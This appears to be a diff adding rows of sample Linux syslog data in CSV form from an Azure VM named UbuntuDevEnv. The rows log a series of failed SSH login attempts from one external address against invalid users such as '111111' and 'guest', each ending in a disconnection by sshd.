+2094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:27,UbuntuDevEnv,2019-06-28 05:08:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:29,UbuntuDevEnv,2019-06-28 05:08:29,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:29,UbuntuDevEnv,2019-06-28 05:08:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:32,UbuntuDevEnv,2019-06-28 05:08:31,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:32,UbuntuDevEnv,2019-06-28 05:08:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:34,UbuntuDevEnv,2019-06-28 05:08:33,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:34,UbuntuDevEnv,2019-06-28 05:08:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:35,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:35,auth,UbuntuDevEnv,info,Disconnecting invalid user 111111 193.201.224.232 port 10000: Too many authentication failures [preauth],91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:35,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user 111111 from 193.201.224.232 port 10000 ssh2 [preauth],91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:35,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:35,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 10000 ssh2,91561,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,10000,,
+2106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:36,auth,UbuntuDevEnv,info,Invalid user 111111 from 193.201.224.232 port 23031,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:36,UbuntuDevEnv,2019-06-28 05:08:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:38,UbuntuDevEnv,2019-06-28 05:08:38,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:38,UbuntuDevEnv,2019-06-28 05:08:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:40,UbuntuDevEnv,2019-06-28 05:08:40,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:40,UbuntuDevEnv,2019-06-28 05:08:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:43,UbuntuDevEnv,2019-06-28 05:08:42,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:43,UbuntuDevEnv,2019-06-28 05:08:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:44,UbuntuDevEnv,2019-06-28 05:08:44,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:44,UbuntuDevEnv,2019-06-28 05:08:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:46,UbuntuDevEnv,2019-06-28 05:08:46,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:46,UbuntuDevEnv,2019-06-28 05:08:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:48,UbuntuDevEnv,2019-06-28 05:08:48,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 23031 ssh2,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:48,UbuntuDevEnv,2019-06-28 05:08:48,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user 111111 from 193.201.224.232 port 23031 ssh2 [preauth],91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:48,UbuntuDevEnv,2019-06-28 05:08:48,auth,UbuntuDevEnv,info,Disconnecting invalid user 111111 193.201.224.232 port 23031: Too many authentication failures [preauth],91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,23031,,
+2122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:48,UbuntuDevEnv,2019-06-28 05:08:48,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:48,UbuntuDevEnv,2019-06-28 05:08:48,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,91608,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:49,UbuntuDevEnv,2019-06-28 05:08:49,auth,UbuntuDevEnv,info,Invalid user 111111 from 193.201.224.232 port 61661,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,61661,,
+2125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:49,UbuntuDevEnv,2019-06-28 05:08:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:49,UbuntuDevEnv,2019-06-28 05:08:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:51,UbuntuDevEnv,2019-06-28 05:08:50,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 61661 ssh2,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,61661,,
+2128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:51,UbuntuDevEnv,2019-06-28 05:08:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:53,UbuntuDevEnv,2019-06-28 05:08:52,auth,UbuntuDevEnv,info,Failed password for invalid user 111111 from 193.201.224.232 port 61661 ssh2,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,61661,,
+2130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:54,UbuntuDevEnv,2019-06-28 05:08:54,auth,UbuntuDevEnv,info,"Disconnecting invalid user 111111 193.201.224.232 port 61661: Change of username or service not allowed: (111111,ssh-connection) -> (guest,ssh-connection) [preauth]",91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,111111,193.201.224.2,61661,,
+2131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:54,UbuntuDevEnv,2019-06-28 05:08:54,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91650,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:56,UbuntuDevEnv,2019-06-28 05:08:56,auth,UbuntuDevEnv,info,Invalid user guest from 193.201.224.232 port 27400,91668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,27400,,
+2133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:57,UbuntuDevEnv,2019-06-28 05:08:56,auth,UbuntuDevEnv,info,Failed none for invalid user guest from 193.201.224.232 port 27400 ssh2,91668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,27400,,
+2134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:57,UbuntuDevEnv,2019-06-28 05:08:56,auth,UbuntuDevEnv,info,"Disconnecting invalid user guest 193.201.224.232 port 27400: Change of username or service not allowed: (guest,ssh-connection) -> (Guest,ssh-connection) [preauth]",91668,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,27400,,
+2135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:58,UbuntuDevEnv,2019-06-28 05:08:58,auth,UbuntuDevEnv,info,Invalid user Guest from 193.201.224.232 port 30155,91680,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Guest,193.201.224.2,30155,,
+2136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:59,UbuntuDevEnv,2019-06-28 05:08:59,auth,UbuntuDevEnv,info,Failed none for invalid user Guest from 193.201.224.232 port 30155 ssh2,91680,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Guest,193.201.224.2,30155,,
+2137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:08:59,UbuntuDevEnv,2019-06-28 05:08:59,auth,UbuntuDevEnv,info,"Disconnecting invalid user Guest 193.201.224.232 port 30155: Change of username or service not allowed: (Guest,ssh-connection) -> (guest,ssh-connection) [preauth]",91680,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Guest,193.201.224.2,30155,,
+2138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:01,UbuntuDevEnv,2019-06-28 05:09:00,auth,UbuntuDevEnv,info,Invalid user guest from 193.201.224.232 port 32948,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:01,UbuntuDevEnv,2019-06-28 05:09:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:01,UbuntuDevEnv,2019-06-28 05:09:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:03,UbuntuDevEnv,2019-06-28 05:09:02,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:04,UbuntuDevEnv,2019-06-28 05:09:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:06,UbuntuDevEnv,2019-06-28 05:09:05,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:06,UbuntuDevEnv,2019-06-28 05:09:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:09,UbuntuDevEnv,2019-06-28 05:09:08,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:09,UbuntuDevEnv,2019-06-28 05:09:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:11,UbuntuDevEnv,2019-06-28 05:09:10,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:11,UbuntuDevEnv,2019-06-28 05:09:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:13,UbuntuDevEnv,2019-06-28 05:09:13,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:13,UbuntuDevEnv,2019-06-28 05:09:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:15,UbuntuDevEnv,2019-06-28 05:09:14,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 193.201.224.232 port 32948 ssh2,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:15,UbuntuDevEnv,2019-06-28 05:09:14,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user guest from 193.201.224.232 port 32948 ssh2 [preauth],91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,193.201.224.2,32948,,
+2153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:09:15,UbuntuDevEnv,2019-06-28 05:09:14,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
